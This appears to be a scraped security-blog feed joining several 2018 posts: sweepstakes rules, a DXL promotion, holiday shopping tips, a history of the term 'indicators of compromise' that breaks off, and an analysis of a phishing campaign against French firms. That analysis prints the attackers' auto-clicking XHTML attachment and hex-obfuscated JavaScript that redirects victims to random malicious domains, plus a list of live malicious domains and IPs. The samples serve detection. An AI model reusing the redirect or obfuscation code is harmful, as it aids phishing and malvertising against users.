"authordetail": "Gary Davis is Chief Consumer Security Evangelist. Through a consumer lens, he partners with internal teams to drive strategic alignment of products with the needs of the security space. Gary also provides security education to businesses and consumers by distilling complex security topics into actionable advice. Follow Gary Davis on Twitter at @garyjdavis",
"tinyimage": "https://securingtomorrow.mcafee.com/wp-content/uploads/2018/11/Ep19_400x300_Overlay.jpg",
"feedimageurl": "https://securingtomorrow.mcafee.com/wp-content/uploads/2018/11/Ep19_400x300_Overlay.jpg",
"pubDate": "Monday 26 Nov 2018 12:35:48 +0000"
}
}

The post Is a Laptop’s Password Enough to Keep it Secure? appeared first on McAfee Blogs.

Stay Secure and Your Wallet Full with Our Holiday Shopping #RT2Win Sweepstakes!

Black Friday and Cyber Monday mark the unofficial kickoff to the holiday shopping season. In anticipation of the busiest time of year for e-commerce, this year we conducted the Stressed Holiday Online Shopping survey to understand how financial pressure can impact buyer behavior when it comes to online purchasing and cybersecurity.

The economic burden of the holidays is something consumers know all too well. From gifts for the family to parties with friends, it’s no wonder that 79 percent of survey respondents said that holiday shopping puts financial stress on them. And the stress of stretching that budget lead 53 percent of respondents to say they can to be careless when online shopping. Further, more than half of consumers (56 percent) said that they would use a website they were unfamiliar with if it meant they would save money.

But just in time for holiday shopping season, we’re here to help take the financial burden off your shoulders with our Holiday Shopping RT2Win Sweepstakes! Two [2] lucky winners of the sweepstakes drawing will receive a $500 Amazon gift card. The best part? Entering is a breeze! Follow the instructions below to enter and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, follow @McAfee_Home on Twitter and find the #RT2Win sweepstakes tweet.
  • The sweepstakes tweet will be released on Monday, November 26, 2018, 2018 at 12:00pm PT. This tweet will include the hashtags: #ProtectWhatMatters, #RT2Win AND #Sweepstakes.
  • Retweet the sweepstakes tweet released on the above date, from your own handle. The #ProtectWhatMatters, #RT2Win AND #Sweepstakes hashtags must be included to be entered.
  • Make sure you’re following @McAfee_Home on Twitter! You must follow for your entry to count.
  • Sweepstakes will end on Sunday, December 9, 2018 at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Tuesday, December 11, 2018 via Twitter direct message.
  • Limit one entry per person.
1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#ProtectWhatMatters, #RT2Win, AND #Sweepstakes” for a chance to win a $500 Amazon gift card (for full prize details please see “Prizes” section below). Two [2] total winners will be selected and announced on December 10, 2018. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#RT2Win Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee Holiday Shopping #RT2Win Sweepstakes will be conducted from November 26, 2018 through December 9, 2018. All entries for each day of the McAfee Holiday Shopping #RT2Win Sweepstakes must be received during the time allotted for the McAfee Holiday Shopping #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee Holiday Shopping #RT2Win Sweepstakes, duration is as follows:

  • Begins: Monday, November 26, 2018­­ at 12:00pm PST
  • Ends: Sunday, December 9, 2018 at 11:59pm PST
  • Two [2] winners will be announced: Tuesday, December 11, 2018

For the McAfee Holiday Shopping #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Holiday Shopping #RT2Win Sweepstakes:

  1. Follow @McAfee_Home on Twitter.
  2. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #ProtectWhatMatters, #RT2Win and #Sweepstakes.
  3. Retweet the sweepstakes tweet of the day and make sure it includes the #ProtectWhatMatters, #RT2Win, and hashtags.
  4. Note: Tweets that do not contain the #ProtectWhatMatters, #RT2Win, and #Sweepstakes hashtags will not be considered for entry.
  5. Limit one entry per person.

Two [2] winners will be chosen for the McAfee Holiday Shopping #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #ProtectWhatMatters, #RT2Win and #Sweepstakes. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on Tuesday, December 11, 2018 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.   

3. Eligibility: 

McAfee Holiday Shopping #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the McAfee Holiday Shopping #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and McAfee Holiday Shopping #RT2Win Sweepstakes not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible. 

4. Winner Selection:

Winners will be selected at random from all eligible retweets received during the McAfee Holiday Shopping #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of two [2] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee Holiday Shopping #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification:  

Each winner will be notified via direct message (“DM”) on Twitter.com by December 11, 2018. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited, and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

6. Prizes: 

The prize for the McAfee Holiday Shopping #RT2Win Sweepstakes is a $500 Amazon gift card for each of the two [2] entrants/winners. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Holiday Shopping #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Holiday Shopping #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

Limit one (1) prize per person/household. Prizes are non-transferable, and no cash equivalent or substitution of prize is offered. The McAfee Holiday Shopping #RT2Win Sweepstakes has no affiliation with Amazon.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Holiday Shopping #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee Holiday Shopping #RT2Win Sweepstakes. entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Holiday Shopping #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Holiday Shopping #RT2Win Sweepstakes-related activity, or participation in the McAfee Holiday Shopping #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  • To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  • Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.
9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with the prize McAfee Holiday Shopping #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee Holiday Shopping #RT2Win Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Holiday Shopping #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Holiday Shopping #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with these sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of the State of New York, U.S.A.

12. Privacy Policy: 

Personal information obtained in connection with this prize McAfee Holiday Shopping #RT2Win Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html.

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after November 26, 2018 before December 9, 2018, to the address listed below, Attn: #RT2Win at CES Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS Pulse, 111 Sutter St., Suite 850, San Francisco, CA 94104

The post Stay Secure and Your Wallet Full with Our Holiday Shopping #RT2Win Sweepstakes! appeared first on McAfee Blogs.

Are You Sharing in this Cyberwarfare?

If your organization is, you can win on a couple fronts…

In traditional warfare, information sharing is key. The notion of sharing insight on your opponent is extremely valuable and cannot be underestimated. The basic principles in Sun Tzu’s The Art of War state you must know yourself and know your opponent to be successful. Cyberwarfare is no different. Information is obtained and exchanged to gain the upper hand. Translating to cybersecurity, you must know your vulnerabilities; understand the attackers’ tactics; and leverage a vulnerability (system or user), deception, hiding tactics, and strike efforts at an unexpected time and location. Sharing this insight is crucial to establishing detection and protection strategies. Just start with your current infrastructure sharing insight. Imagine your IT and security functions working together to protect your environment. Consider if critical vulnerability information is shared with your endpoint security or if network security blocks suspicious users or devices to detect and confine highly vulnerable devices. Maximizing your IT infrastructure to coordinate efforts will deter the creative attacker.

Basics of cybersharing

Cybersharing discussions begin with essential cybersharing framework components that address the why and the what:

  • Identify the problem to be solved
  • List the functions or products involved
  • Simply describe what you want to happen
  • Map these actions to one of four key capabilities (receive an event, ask a question, take action, and publish an event)

Using a robust cybersecurity sharing framework takes the technical heavy lifting out of integrations, allowing you to focus on what’s important. Cybersharing begins with understanding the problem you are trying to solve (such as blocking a non-compliant endpoint from your network), knowing what products are involved (endpoint solution or a Network Access Control solution), understanding what you want to have happen (if an endpoint is incorrectly configured, be sure to restrict its network access), and mapping these to framework capabilities (ask the endpoint a question on its configuration status, transmit this status to the Network Access Control solution, and depending on the status, allow or block). It’s really that simple, automated, and effective.

(on the side) Integrating security tools can improve your response time by 20% (MSI Research, 2018).

Highs and lows of cybersharing

Cybersharing is not a new concept. The industry has been working on it for a while with many stakeholders. Many initiatives have come and gone in the past—the industry has always clamored for it, but it has often fallen into the “too hard” or “too expensive” bracket. Until now. There is now a belief among security vendors that we cannot do everything with just one vendor. Sharing is essential to defending our environments and defeating our adversaries.

A cybersharing option to consider

Sharing can be difficult and time-consuming. Just getting the connection to share the information may require writing to a proprietary API, which means lots of maintenance and manual efforts to add new connections. And once you have the connection, the information flow is daunting. Imagine a world where you simply share within your environment without the need to write to proprietary APIs or write with prescribed data structures.

Enter Data Exchange Layer (DXL). DXL is an established and proven communication layer, allowing security functions and tools to share and collaborate information based on a messaging topic. It’s like real-time tweets, only in this context the “tweet” would be a piece of security information and the “followers” would be your security products.

Over 4,000 organizations are participating in OpenDXL, the open source initiative using DXL to interconnect security functions to coordinate defenses. This interconnection can be a one-to-many-systems ratio or a one-to-one. It may be a simple exchange of specific threat intelligence or threat insight with a recommended response. We feel open sourcing this framework is key to information sharing—no ties to a vendor, no lock-in, and no restrictions on who or what products can integrate with DXL.

Everything you need to get started is on OpenDXL.com—from the components, to pre-built development environments in Docker containers, to documentation and pre-built integrations (including in many cases the source code). Get started and elevate your security program today.

Taking cybersharing to new heights

It’s time to join the DXL challenge—the first cybersharing contest of its kind. We’re introducing a recognition program, DXL Super Stars, to share these critical DXL integrations that improve security efficiency and efficacy. Join the cybersharers and win cash! Don’t delay—submissions must be in by late January.

 

The post Are You Sharing in this Cyberwarfare? appeared first on McAfee Blogs.

Phishing Campaign targeting French Industry

We have recently observed an ongoing phishing campaign targeting the French industry. Among these targets are organizations involved in chemical manufacturing, aviation, automotive, banking, industry software providers, and IT service providers. Beginning October 2018, we have seen multiple phishing emails which follow a similar pattern, similar indicators, and obfuscation with quick evolution over the course of the campaign. This post will give a quick look into how the campaign has evolved, what it is about, and how you can detect it.

Phishing emails

The phishing emails usually refer to some document that could either be an attachment or could supposedly be obtained by visiting the link provided. The use of the French language here appears to be native and very convincing.

The subject of the email follows the prefix of the attachment name. The attachments could be an HTML or a PDF file usually named as “document“, “preuves“, or “fact” which can be followed by underscore and 6 numbers. Here are some of the attachment names we have observed:

  • fact_395788.xht
  • document_773280.xhtml
  • 474362.xhtml
  • 815929.htm
  • document_824250.html
  • 975677.pdf
  • 743558.pdf

Here’s an example content of an XHTML attachment from 15th of November:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta content="UTF-8" />
</head>
<body onload='document.getElementById("_y").click();'>
<h1>
<a id="_y" href="https://t[.]co/8hMB9xwq9f?540820">Lien de votre document</a>
</h1>
</body>
</html>

 

Evolution of the campaign

The first observed phishing emails in the beginning of October contained an unobfuscated payload address. For example:

  • hxxp://piecejointe[.]pro/facture/redirect[.]php
  • hxxp://mail-server-zpqn8wcphgj[.]pw?client=XXXXXX

These links were inside HTML/XHTML/HTM attachments or simply as links in the email body. The attachment names used were mostly document_[randomized number].xhtml.

Towards the end of October these payload addresses were further obfuscated by putting them behind redirects. The author has developed a simple Javascript to obfuscate a bunch of .pw domains.

var _0xa4d9=["\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77",
"\x7A\x71\x63\x7A\x66\x6E\x32\x6E\x6E\x6D\x75\x65\x73\x68\x38\x68\x74\x79\x67\x2E\x70\x77",
"\x66\x38\x79\x33\x70\x35\x65\x65\x36\x64\x6C\x71\x72\x37\x39\x36\x33\x35\x7A\x2E\x70\x77",
"\x65\x72\x6B\x79\x67\x74\x79\x63\x6F\x6D\x34\x66\x33\x79\x61\x34\x77\x69\x71\x2E\x70\x77",
"\x65\x70\x72\x72\x39\x71\x79\x32\x39\x30\x65\x62\x65\x70\x6B\x73\x6D\x6B\x62\x2E\x70\x77",
"\x37\x62\x32\x64\x75\x74\x62\x37\x76\x39\x34\x31\x34\x66\x6E\x68\x70\x36\x63\x2E\x70\x77",
"\x64\x69\x6D\x76\x72\x78\x36\x30\x72\x64\x6E\x7A\x36\x63\x68\x6C\x77\x6B\x65\x2E\x70\x77",
"\x78\x6D\x76\x6E\x6C\x67\x6B\x69\x39\x61\x39\x39\x67\x35\x6B\x62\x67\x75\x65\x2E\x70\x77",
"\x62\x72\x75\x62\x32\x66\x77\x64\x39\x30\x64\x38\x6D\x76\x61\x70\x78\x6E\x6C\x2E\x70\x77",
"\x68\x38\x39\x38\x6A\x65\x32\x68\x74\x64\x64\x61\x69\x38\x33\x78\x63\x72\x37\x2E\x70\x77",
"\x6C\x32\x6C\x69\x69\x75\x38\x79\x64\x7A\x6D\x64\x66\x30\x31\x68\x69\x63\x72\x2E\x70\x77",
"\x63\x79\x6B\x36\x6F\x66\x6D\x75\x6E\x6C\x35\x34\x72\x36\x77\x6B\x30\x6B\x74\x2E\x70\x77",
"\x7A\x78\x70\x74\x76\x79\x6F\x64\x6A\x39\x35\x64\x77\x63\x67\x6B\x6C\x62\x77\x2E\x70\x77",
"\x35\x65\x74\x67\x33\x6B\x78\x6D\x69\x78\x67\x6C\x64\x73\x78\x73\x67\x70\x65\x2E\x70\x77",
"\x38\x35\x30\x6F\x6F\x65\x70\x6F\x6C\x73\x69\x71\x34\x6B\x71\x6F\x70\x6D\x65\x2E\x70\x77",
"\x6F\x6D\x63\x36\x75\x32\x6E\x31\x30\x68\x38\x6E\x61\x71\x72\x30\x61\x70\x68\x2E\x70\x77",
"\x63\x30\x7A\x65\x68\x62\x74\x38\x6E\x77\x67\x6F\x63\x35\x63\x6E\x66\x33\x30\x2E\x70\x77",
"\x68\x36\x6A\x70\x64\x6B\x6E\x7A\x76\x79\x63\x61\x36\x6A\x67\x33\x30\x78\x74\x2E\x70\x77",
"\x74\x64\x32\x6E\x62\x7A\x6A\x6D\x67\x6F\x36\x73\x6E\x65\x6E\x6A\x7A\x70\x72\x2E\x70\x77",
"\x6C\x69\x70\x71\x76\x77\x78\x63\x73\x63\x34\x75\x68\x6D\x6A\x36\x74\x6D\x76\x2E\x70\x77",
"\x31\x33\x72\x7A\x61\x75\x30\x69\x64\x39\x79\x76\x37\x71\x78\x37\x76\x6D\x78\x2E\x70\x77",
"\x6B\x64\x33\x37\x68\x62\x6F\x6A\x67\x6F\x65\x76\x6F\x63\x6C\x6F\x7A\x77\x66\x2E\x70\x77",
"\x66\x75\x67\x65\x39\x69\x6F\x63\x74\x6F\x38\x39\x63\x6B\x36\x7A\x62\x30\x76\x2E\x70\x77",
"\x70\x6D\x63\x35\x6B\x71\x6C\x78\x6C\x62\x6C\x78\x30\x65\x67\x74\x63\x37\x32\x2E\x70\x77",
"\x30\x71\x38\x31\x73\x73\x72\x74\x68\x69\x72\x63\x69\x62\x70\x6A\x62\x33\x38\x2E\x70\x77","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x68\x74\x74\x70\x3A\x2F\x2F","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];
var arr=[_0xa4d9[0],_0xa4d9[1],_0xa4d9[2],_0xa4d9[3],_0xa4d9[4],_0xa4d9[5],_0xa4d9[6],_0xa4d9[7],_0xa4d9[8],_0xa4d9[9],_0xa4d9[10],_0xa4d9[11],_0xa4d9[12],_0xa4d9[13],_0xa4d9[14],_0xa4d9[15],_0xa4d9[16],_0xa4d9[17],_0xa4d9[18],_0xa4d9[19],_0xa4d9[20],_0xa4d9[21],_0xa4d9[22],_0xa4d9[23],_0xa4d9[24]];
var redir=arr[Math[_0xa4d9[27]](Math[_0xa4d9[25]]()* arr[_0xa4d9[26]])];
window[_0xa4d9[30]][_0xa4d9[29]](_0xa4d9[28]+ redir)

This Javascript code, which was part of the attachment, deobfuscated an array of [random].pw domains that redirected the users to the payload domain. In this particular campaign, the payload domain has changed to hxxp://email-document-joint[.]pro/redir/.

However, it appears that the use of Javascript code inside attachments was not a huge success as only some days later, the Javascript code for domain deobfuscation and redirection has been moved behind pste.eu, a Pastebin-like service for HTML code. So then the phishing emails thereafter contained links to pste.eu such as hxxps[://]pste[.]eu/p/yGqK[.]html.

In the next iteration of evolution during November, we observed few different styles. Some emails contained links to subdomains of random .pw or .site domains such as:

  • hxxp://6NZX7M203U[.]p95jadah5you6bf1dpgm[.]pw
  • hxxp://J8EOPRBA7E[.]jeu0rgf5apd5337[.]site.

At this point .PDF files were also seen in the phishing emails as attachments. Those PDFs contained similar links to a random subdomain in .site or .website domains.

Few days later at 15th of November, the attackers continued to add redirections in between the pste.eu URLs by using Twitter shortened URLs. They used a Twitter account to post 298 pste.eu URLs and then included the t.co equivalents into their phishing emails. The Twitter account appears to be some sort of advertising account with very little activity since its creation in 2012. Most of the tweets and retweets are related to Twitter advertisement campaigns or products/lotteries etc.

 

The pste.eu links in Twitter

 

Example of the URL redirections

The latest links used in the campaign are random .icu domains leading to 302 redirection chain. The delivery method remained as XHTML/HTML attachments or links in the emails. The campaign appears to be evolving fairly quickly and the attackers are active in generating new domains and new ways of redirection and obfuscation. At the time of writing, it seems the payload URLs lead to an advertising redirection chain with multiple different domains and URLs known for malvertising.

 

Infrastructure

The campaign has been observed using mostly compromised Wanadoo email accounts and later email accounts in their own domains such as: rault@3130392E3130322E37322E3734.lho33cefy1g.pw to send out the emails. The subdomain name is the name of the sending email server and is a hex representation of the public IP address of the server, in this case: 109.102.72.74.

The server behind the .pw domain appears to be a postfix email server listed already on multiple blacklists. For compromised email accounts used for sending out the phishing emails, they are always coming from .fr domains.

The links in the emails go through multiple URLs in redirection chains and most of the websites are hosted in the same servers.

Following the redirections after the payload domains (e.g. email-document-joint[.]pro or .pw payload domains) later in November, we get redirected to domains such as ffectuermoi[.]tk or eleverqualit[.]tk. These were hosted on the same servers with a lot of similar looking domains. Closer investigation of these servers revealed that they were known for hosting PUP/Adware programs and more malvertising URLs.

Continuing on to ffectuermoi[.]tk domain would eventually lead to doesok[.]top, which serves advertisements while setting cookies along the way. The servers hosting doesok[.]top are also known for hosting PUP/adware/malware.

 

Additional Find

During the investigation we came across an interesting artifact in Virustotal submitted from France. The file is a .zip archive that contained the following

  • All in One Checker” tool – a tool that can be used to verify email account/password dumps for valid accounts/combinations
  • .vbs dropper – a script that drops a backdoor onto the user’s system upon executing the checker tool
  • Directory created by the checker tool – named with the current date and time of the tool execution that contains results in these text files:
    • Error.txt – contains any errors
    • Good.txt – verified results
    • Ostatok.txt – Ostatok means “the rest” or “remainder”

Contents of the .zip file. 03.10_17:55 is the directory created by the tool containing the checker results. Both .vbs are exactly the same backdoor dropper. The rest are configuration files and the checker tool itself.

 

Contents of the directory created by the checker tool

Almost all of the email accounts inside these .txt files are from .fr domains, and one of them is actually the same address we saw used as a sender in one of the phishing emails in 19th of October. Was this tool used by the attackers behind this campaign? It seems rather fitting.

But what caused them to ZIP up this tool along with the results to Virustotal?

When opening the All In One Checker tool, you are greeted with a lovely message and pressing continue will attempt to install the backdoor.

We replaced the .vbs dropper with Wscript.Echo() alert

 

Hey great!

Perhaps they wanted to check the files because they accidentally infected themselves with a backdoor.

 

Indicators

This is a non-exhaustive list of indicators observed during the campaign.

2bv9npptni4u46knazx2.pw
p95jadah5you6bf1dpgm.pw
lho33cefy1g.pw
mail-server-zpqn8wcphgj.pw
http://piecejointe.pro/facture/redirect.php
http://email-document-joint.pro/redir/
l45yvbz21a.website
95plb963jjhjxd.space
sjvmrvovndqo2u.icu
jeu0rgf5apd5337.site
95.222.24.44 - Email Server
109.102.72.74 - Email Server
83.143.150.210 - Email Server
37.60.177.228 - Web Server / Malware C2  
87.236.22.87 Web Server / Malware C2 
207.180.233.109 - Web Server
91.109.5.170 - Web Server
162.255.119.96 - Web Server
185.86.78.238 - Web Server
176.119.157.62 - Web Server
113.181.61.226

The following indicators have been observed but are benign and can cause false positives.

https://pste.eu
https://t.co

IDG Contributor Network: More AI, consolidation and regionalization coming in 2019

In reflecting on 2018 from a security perspective, some of the major themes, as I’ve written previously, have been about new AI security tools, industry consolidation and the blurring of lines between physical and cyber security. GRDP, the California Consumer Privacy Act and Facebook’s seemingly never-ending scandals related to consumer privacy have also raised regulatory and public awareness of data privacy as a key issue and concern.

These discussions will continue into next year and beyond, and there a number of other big trends that are likely to dominate the security industry in 2019. Here are seven that I believe we’ll be looking at in the new year and for some time after that:

To read this article in full, please click here

8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Choose a password that is unhackable rather than one that is super easy to remember.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

The Origin of the Term Indicators of Compromise (IOCs)

I am an historian. I practice digital security, but I earned a bachelor's of science degree in history from the United States Air Force Academy. (1)

Historians create products by analyzing artifacts, among which the most significant is the written word.

In my last post, I talked about IOCs, or indicators of compromise. Do you know the origin of the term? I thought I did, but I wanted to rely on my historian's methodology to invalidate or confirm my understanding.

I became aware of the term "indicator" as an element of indications and warning (I&W), when I attended Air Force Intelligence Officer's school in 1996-1997. I will return to this shortly, but I did not encounter the term "indicator" in a digital security context until I encountered the work of Kevin Mandia.

In August 2001, shortly after its publication, I read Incident Response: Investigating Computer Crime, by Kevin Mandia, Chris Prosise, and Matt Pepe (Osborne/McGraw-Hill). I was so impressed by this work that I managed to secure a job with their company, Foundstone, by April 2002. I joined the Foundstone incident response team, which was led by Kevin and consisted of Matt Pepe, Keith Jones, Julie Darmstadt, and me.

I Tweeted earlier today that Kevin invented the term "indicator" (in the IR context) in that 2001 edition, but a quick review of the hard copy in my library does not show its usage, at least not prominently. I believe we were using the term in the office but that it had not appeared in the 2001 book. Documentation would seem to confirm that, as Kevin was working on the second edition of the IR book (to which I contributed), and that version, published in 2003, features the term "indicator" in multiple locations.

In fact, the earliest use of the term "indicators of compromise," appearing in print in a digital security context, appears on page 280 in Incident Response & Computer Forensics, 2nd Edition.


From other uses of the term "indicators" in that IR book, you can observe that IOC wasn't a formal, independent concept at this point, in 2003. In the same excerpt above you see "indicators of attack" mentioned.

The first citation of the term "indicators" in the 2003 book shows it is meant as an investigative lead or tip:


Did I just give up my search at this point? Of course not.

If you do time-limited Google searches for "indicators of compromise," after weeding out patent filings that reference later work (from FireEye, in 2013), you might find this document, which concludes with this statement:

